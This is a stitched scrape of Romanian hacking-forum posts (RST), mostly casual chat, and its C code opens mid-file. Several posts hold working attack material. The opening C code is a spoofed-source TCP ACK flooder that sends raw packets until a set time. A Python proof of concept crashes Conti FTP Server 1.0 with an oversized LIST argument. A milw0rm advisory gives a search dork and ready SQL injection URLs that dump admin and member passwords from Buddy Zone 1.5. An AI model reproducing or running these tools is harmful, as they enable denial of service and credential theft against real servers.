u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct tcpopt_hdr { u_char type; /* type */ u_char len; /* length */ u_short value; /* value */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; /* struct tcpopt_hdr opt; */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; int sock; /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } void stream (int t, int until, u_long dstaddr, char *dstaddrs[]) { struct timespec ts; int on = 1; if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) return; if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(int)) == -1) return; srand((time(NULL) ^ getpid()) + getppid()); memset(&packet, 0, sizeof packet); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); packet.ip.ip_len = FIX(sizeof packet); packet.ip.ip_off = 0; /* IP_DF? */ packet.ip.ip_ttl = 255; if (!t) packet.ip.ip_dst.s_addr = dstaddr; packet.tcp.th_flags = TH_ACK; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; /* 5 */ packet.tcp.th_urp = 0; packet.tcp.th_sport = rand(); packet.tcp.th_dport = rand(); if (!t) cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; if (!t) s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; while (time(0) <= until) { if (t) { int x; for (x = 0 ; dstaddrs[x] != NULL ; x++) { if (!strchr(dstaddrs[x], '.')) break; packet.ip.ip_dst.s_addr = inet_addr(dstaddrs[x]); cksum.pseudo.daddr = inet_addr(dstaddrs[x]); s_in.sin_addr.s_addr = inet_addr(dstaddrs[x]); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); ++packet.ip.ip_id; ++packet.tcp.th_sport; ++packet.tcp.th_seq; s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof cksum); sendto(sock, &packet, sizeof packet, 0, (struct sockaddr *)&s_in, sizeof s_in); } } else { cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); ++packet.ip.ip_id; ++packet.tcp.th_sport; ++packet.tcp.th_seq; s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof cksum); sendto(sock, &packet, sizeof packet, 0, (struct sockaddr *)&s_in, sizeof s_in); } } } void nlstr (char *str) { if (str[strlen(str)-1] == '\n') str[strlen(str)-1] = '\0'; }
-
mio trebuit sai scot la RAS banu de la bug reports .. amu mi-o pus 40 de buguri ma doare mana.. inca cateva zile si scriptu o sa fie automat.. o sa verifice dak ii valid xss-u .. calculeaza automat punctele .. le aproba.. si da ban 1 sapt dak mai gaseste bugu inca odata introdus [partea care imi place cel mai mult]
-
gata bre !
-
pune un mozart .. ceva texte despre cum manca porcii si gainile si viata de la tara...
-
si eu recomand sa folosesti xp-u pe 32 ca nu am vazut nici la mine mare diferenta .. si pe linux nu s-a vazut mare performata [testat gentoo] procesorul pe 64 parerea mea ii bun la incarcari full .. masive de date .. perfect pt servere .. la altceva nui vad utilitatea
-
scuze n-am vazut postu de dinainte
-
accepti bere sau tigari? 7. bafta
-
http://www.securityfocus.com/archive/1/472346/30/0/threaded #Conti FTP Server v1.0 Denial of Service #author: 35c666 #contact: #Download: [url]http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe[/url] #Bug: Conti Ftp Server crashes when a large //A: string is sent, denying legitimate users access to their accounts. #greetz to all RST members at [url]http://rstzone.net[/url] # usr/bin/python import socket import time buff = "//A:" user = "test" password = "test" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: conn = s.connect(("172.16.112.129",21)) d = s.recv(1024) print "Server <- " + d time.sleep(2) s.send('USER %s\r\n' % user) print "Client -> USER " + user d = s.recv(1024) print "Server <- " + d time.sleep(2) s.send('PASS %s\r\n' % password) print "Client -> PASS " + password d = s.recv(1024) print "Server <- " + d time.sleep(2) s.send('LIST %s\r\n' % buff) print "Client -> LIST " + buff d = s.recv(1024) print d time.sleep(2) except: print "- Nu m-am putut conecta." -- Click for FHA loan, $0 lender fees, low rates & approvals nationwide [url]http://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYo[/url] Y19IzyPIitWQU/ cine-i asta?
-
pr0n
-
flama asa incep si la mine cateodata .. ei ma trezesc dimneata.. io nu-i las sa adoarma seara ... rock/hardcore ...
-
--==+================================================================================+==-- --==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: http://www.vastal.com/buddy-zone-social-networking-script.html DORK: allintext:"Powered By Buddy Zone" DESCRIPTION: Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts. EXPLOITS: http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/* http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/* Tip/Note: The Administrator's Panel is in /admin/. GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps ! --==+================================================================================+==-- --==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==-- --==+================================================================================+==-- # milw0rm.com [2007-06-29]
-
Frumos ! tutorial pus ! http://rstzone.net/index.php?pagina=tutoriale&selecteaza=tutorial&id=34 or txt: http://rstzone.net/tutorialtxt.php?id=34
-
la inceput a fost ff bun ! acuma nu mai stiu ce-i de el
-
taceti mah si lasati omul in pace deabia a venit pe forum si-l atacati ! o sa invete el regulile! bun venit pe rst ... merci de program